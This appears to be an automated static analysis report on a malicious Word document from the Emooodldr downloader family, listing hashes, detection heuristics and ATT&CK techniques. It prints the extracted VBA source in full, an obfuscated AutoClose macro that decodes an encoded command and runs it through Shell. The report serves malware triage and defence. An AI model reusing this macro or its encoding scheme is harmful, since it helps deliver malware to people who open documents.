Emooodldr — Office (OOXML) malware analysis

Static analysis result for SHA-256 903b1d2fc5f0fd01…

MALICIOUS

Office (OOXML)

33.2 KB Created: 2017-10-25 18:34:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2019-01-12
MD5: a494c62d136444826d33af373c59305c SHA-1: 31082b96d15f45cc5408ad044ba03191a4bab937 SHA-256: 903b1d2fc5f0fd013506915bf31dccf18f96a12efbfa89fa0f27410b98197518
244 Risk Score

Malware Insights

Emooodldr · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is an OOXML document containing VBA macros, specifically an Auto_Close macro that utilizes the Shell() function. Heuristics and ClamAV detection identify it as Emooodldr, a known malware family. The VBA script is designed to deobfuscate and execute a payload, likely a downloader, based on the `inodore` and `immane` functions and the `Shell` call.

Heuristics 6

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2218 bytes
SHA-256: 3ab36c6d3a21c512fe9f8cbf4c716cbc126610657cb0817b46986f43210a4775
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function scavato(viola As Integer) As String
 Dim ruga() As Variant
 ruga = Array("(", "P", "L", ",", "r", "o", ")", "e", "E", "W", "=", ";", "v", "B", "s", "j", "t", ":", "K", "A", "d", ".", "D", "c", " ", "S", "h", "l", "Q", "/", "\", "k", "$", "y", "x", "g", "U", "w", "F", "O", "T", "f", "+", "C", "m", "b", "n", "i", "?", "'", "p", "N", "-", "a")
 Dim suonare As Integer
 
 For suonare = LBound(ruga) To UBound(ruga)
   If suonare = viola Then
    scavato = ruga(suonare)
   End If
 Next
 
End Function

Function sfumare(codice As String)
    codice = StrConv(codice, vbUnicode)
    sfumare = Split(Left(codice, Len(codice) - 1), vbNullChar)
End Function

Function inodore(stupendo As String) As String
  Dim inter As Integer
  Dim rodaggio As String
  Dim docente As Variant
  docente = sfumare(Trim(stupendo))
  For suonare = 0 To Len(stupendo)
  
    If (suonare + 1) <= UBound(docente) Then
    Dim eletto As String
    eletto = docente(suonare)
    suonare = suonare + 1
    eletto = eletto + docente(suonare)
    
    rodaggio = rodaggio + scavato(Int(eletto))
    End If
  Next
  
  inodore = rodaggio
End Function

Public Function immane(rinforzo As String)
  Shell rinforzo, 0
End Function

Sub AutoClose()
 Call Application.Run("immane", inodore("234420210734072429232450053707041426072727245208340723241333505314142452510501245243054444534620240051073752394515072316242533141607442151071621090745432747074616062122053746270553203847270700492616165017292953462047350704445314160704212305442946474605293104054641214420414903243207461217190101221940192442244930052836023918210734074906112425165304165201040523071414243207461217190101221940194930052836023918210734074911240051073752394515072316242533141607442151071621090745432747074616062122053746270553202516044746350049261616501729295346204735070444531416070421230544291421502650484720103104054641490611"))
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 11776 bytes
SHA-256: 6a0dcd44981720e9d02d945e62706141419e799fcee97d58dc47ab83d27b24d3
Detection
ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).